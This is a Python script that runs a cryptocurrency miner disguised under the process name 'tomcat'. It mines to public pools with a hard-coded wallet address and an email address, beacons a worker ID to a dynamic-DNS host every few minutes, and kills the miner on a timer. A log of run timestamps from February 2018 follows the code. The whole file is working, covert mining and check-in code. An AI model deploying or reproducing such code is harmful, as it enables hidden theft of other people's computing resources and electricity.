import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:06.252034
#2018-02-17 16:03:05.909964
#2018-02-17 17:51:06.776149
#2018-02-17 19:38:04.040491
#2018-02-17 21:26:04.107797
#2018-02-17 23:10:07.098850
#2018-02-18 00:57:06.189727
#2018-02-18 02:45:01.636235
#2018-02-18 04:34:05.214106
#2018-02-18 06:25:07.972892
#2018-02-18 08:15:09.308707
#2018-02-18 10:03:05.007046
#2018-02-18 11:49:05.630428
#2018-02-18 13:34:01.262661
#2018-02-18 15:24:05.845326
#2018-02-18 17:12:05.353572
#2018-02-18 19:00:08.088099
#2018-02-18 20:46:07.489882
#2018-02-18 22:32:07.247991
#2018-02-19 00:20:06.686110
#2018-02-19 02:06:01.336617
#2018-02-19 03:52:05.383703
#2018-02-19 05:37:01.496726
#2018-02-19 07:24:07.668767
#2018-02-19 09:14:01.662982
#2018-02-19 11:03:01.230730
#2018-02-19 12:50:11.587091
#2018-02-19 14:38:10.770522
#2018-02-19 16:25:10.387752
#2018-02-19 18:13:02.064297
#2018-02-19 19:59:06.805457
#2018-02-19 21:49:07.854000
#2018-02-19 23:34:07.763640
#2018-02-20 01:19:03.769794
#2018-02-20 03:09:03.782740
#2018-02-20 04:57:07.514317
#2018-02-20 06:39:04.994595
#2018-02-20 08:24:04.482145
#2018-02-20 10:09:01.297290
#2018-02-20 11:54:01.806500
#2018-02-20 13:43:06.065576
#2018-02-20 15:30:11.114205
#2018-02-20 17:16:06.014370
#2018-02-20 19:06:08.324139
#2018-02-20 20:54:01.927453
#2018-02-20 22:40:05.199434
#2018-02-21 00:24:02.029008
#2018-02-21 02:09:05.886945
#2018-02-21 03:57:06.938121
#2018-02-21 05:44:06.950304
#2018-02-21 07:35:05.661544
#2018-02-21 09:20:06.617935
#2018-02-21 11:10:05.044735
#2018-02-21 12:57:02.205109
#2018-02-21 14:45:10.007575
#2018-02-21 16:33:10.172825
#2018-02-21 18:23:08.307704
#2018-02-21 20:09:07.426294
#2018-02-21 21:56:05.880202
#2018-02-21 23:45:04.782071
#2018-02-22 01:36:07.145830
#2018-02-22 03:23:03.526835
#2018-02-22 05:10:07.713640
#2018-02-22 06:54:06.676399
#2018-02-22 08:41:02.057531
#2018-02-22 10:28:06.713458
#2018-02-22 12:16:10.327751
#2018-02-22 14:00:15.529710
#2018-02-22 15:48:13.720532
#2018-02-22 17:36:05.636444
#2018-02-22 19:24:07.983311
#2018-02-22 21:17:06.647634
#2018-02-22 23:04:07.749804
#2018-02-23 00:52:05.669019
#2018-02-23 02:39:05.254041
#2018-02-23 04:27:06.626292
#2018-02-23 06:14:06.093268
#2018-02-23 08:01:01.608036
#2018-02-23 10:10:02.501002
#2018-02-23 12:03:12.338201
#2018-02-23 13:51:09.175621
#2018-02-23 15:44:06.070282
#2018-02-23 17:29:09.995032
#2018-02-23 19:18:03.553082
#2018-02-23 21:02:07.302821
#2018-02-23 22:46:07.433404
#2018-02-24 00:31:05.848714
#2018-02-24 02:22:05.628399
#2018-02-24 04:11:07.805106
#2018-02-24 05:59:05.972996
#2018-02-24 07:48:04.893346
#2018-02-24 09:33:07.214600
#2018-02-24 11:27:01.823941
#2018-02-24 13:16:05.225206
#2018-02-24 15:07:04.175861
#2018-02-24 16:55:05.992778
#2018-02-24 18:44:01.700084
#2018-02-24 20:35:02.822300
#2018-02-24 22:38:05.565421
#2018-02-25 02:51:01.849375
#2018-02-25 05:31:05.903149
#2018-02-25 08:09:06.094404
#2018-02-25 11:40:09.814161
#2018-02-25 14:01:01.146038
#2018-02-25 15:35:01.614669